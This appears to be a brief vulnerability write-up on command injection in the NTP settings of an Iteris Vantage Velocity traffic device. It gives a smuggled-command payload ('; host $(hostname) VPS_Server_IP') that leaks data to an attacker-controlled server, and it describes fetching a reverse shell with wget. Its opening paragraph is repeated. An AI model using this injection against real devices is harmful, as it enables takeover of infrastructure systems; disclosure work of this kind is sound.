   More information about the device: <https://www.iteris.com/products/travel-time/vantage-velocity> Affected Versions: - 2.3.1 - 2.4.2 - 3.0 Shodan:  Surfing the internet I found this device that I did not know, and that turned out to be quite interesting. In the first instance what I see is a menu called "Time Settings", inside it, there is a function called "Synchronize With NTP Server", so I imagine that behind it ran something similar to an "ntpdate -u ntp.server. com "for example. so I decided to try the classic ";" and concatenate a new command, in this case a "host $ (hostname) VPS_Server_IP" and on my DNS server I get to the hostname of the device, which confirms that it was possible to execute commands.  Getting hostname...
   More information about the device: <https://www.iteris.com/products/travel-time/vantage-velocity> Affected Versions: - 2.3.1 - 2.4.2 - 3.0 Shodan:  Surfing the internet I found this device that I did not know, and that turned out to be quite interesting. In the first instance what I see is a menu called "Time Settings", inside it, there is a function called "Synchronize With NTP Server", so I imagine that behind it ran something similar to an "ntpdate -u ntp.server. com "for example. so I decided to try the classic ";" and concatenate a new command, in this case a "host $ (hostname) VPS_Server_IP" and on my DNS server I get to the hostname of the device, which confirms that it was possible to execute commands.  Getting hostname  Getting the name of the user I control  Once I could confirm that it is possible to execute a command, you have to try to get a reverse shell. So I use the "wget" command to download a python revershell to take full control of the system  Revershell execution and the device is compromised 
